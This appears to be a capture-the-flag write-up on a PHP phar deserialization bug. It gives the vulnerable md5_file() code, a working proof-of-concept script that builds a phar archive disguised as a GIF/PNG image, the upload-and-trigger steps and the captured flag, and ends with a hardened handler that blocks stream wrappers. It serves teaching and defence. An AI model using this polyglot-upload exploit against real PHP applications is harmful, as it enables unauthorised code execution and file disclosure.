Source code
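<?php
error_reporting(0);

class Capricorn
{
    // Runs automatically whenever a Capricorn object is unserialized.
    public function __wakeup()
    {
        printf("%s\n", __METHOD__);
        echo file_get_contents('/flag');
    }
}

if (isset($_REQUEST['Capricorn'])) {
    // User-controlled path is passed straight to a filesystem function,
    // so stream wrappers such as phar:// are accepted.
    $filename = $_REQUEST['Capricorn'];
    echo md5_file($filename);
} else {
    echo "系统检测发现该处漏洞,进行攻击测试\n";
}
?>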
POC
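<?php
error_reporting(0);

// Empty class with the same name as the target's class.
class Capricorn
{
}

@unlink("cap.phar");
$phar = new Phar("cap.phar");
$phar->startBuffering();
// The GIF89a prefix makes the archive pass as an image.
$phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");
$cap = new Capricorn();
// The metadata is stored in serialized form inside the archive.
$phar->setMetadata($cap);
$phar->addFromString("cap.txt", "CSSEC");
$phar->stopBuffering();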
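Make sure phar.readonly=Off, then run POC.php to generate cap.phar. Change its extension to .png and upload it; the returned path is uploads/cap.png. Then request index.php with the parameter Capricorn=phar://uploads/cap.png. When md5_file() opens the phar:// path, PHP parses the archive and unserializes its metadata, which triggers Capricorn::__wakeup().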
Result
Capricorn::__wakeup Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}
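
A hardened form of the md5_file() handler, as an added example that is not part of the original challenge or write-up: it refuses stream-wrapper schemes and confines the path to the upload directory. `UPLOAD_DIR`, `safe_upload_md5()` and `looks_like_phar()` are hypothetical names.

```php
<?php
// Added example, not the challenge's own code. UPLOAD_DIR, safe_upload_md5()
// and looks_like_phar() are hypothetical names.
const UPLOAD_DIR = __DIR__ . '/uploads';

// If the application never reads phar archives, drop the wrapper entirely.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

// Hash a file only if the request resolves to a regular file in UPLOAD_DIR.
function safe_upload_md5(string $userPath): ?string
{
    // Refuse any scheme prefix (phar://, php://, zip://, ...). The match is
    // case-insensitive so that "PHAR://" is refused as well.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $userPath) === 1) {
        return null;
    }
    $base = realpath(UPLOAD_DIR);
    $real = realpath(UPLOAD_DIR . DIRECTORY_SEPARATOR . basename($userPath));
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // basename() strips directories; this also rejects symlinks leaving UPLOAD_DIR.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    $hash = md5_file($real);
    return $hash === false ? null : $hash;
}

// Upload-time heuristic for the native phar format used by the POC: the stub
// contains the __HALT_COMPILER(); token whatever extension or magic bytes
// (such as the "GIF89a" prefix) the file carries. It does not cover tar- or
// zip-based archives. $path is the server-side temp path of the upload.
function looks_like_phar(string $path): bool
{
    $data = file_get_contents($path);
    return $data !== false && stripos($data, '__HALT_COMPILER();') !== false;
}

// Request handling, keeping the original parameter name.
if (isset($_REQUEST['Capricorn']) && is_string($_REQUEST['Capricorn'])) {
    echo safe_upload_md5($_REQUEST['Capricorn']) ?? 'rejected';
}
```

On PHP 8.0 and later, file functions such as md5_file() no longer unserialize phar metadata automatically; the path checks still apply to older runtimes and to the other stream wrappers.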
Reference: https://www.yuque.com/shiyizhesonder/sonder39/obtegmmu8g0pdewg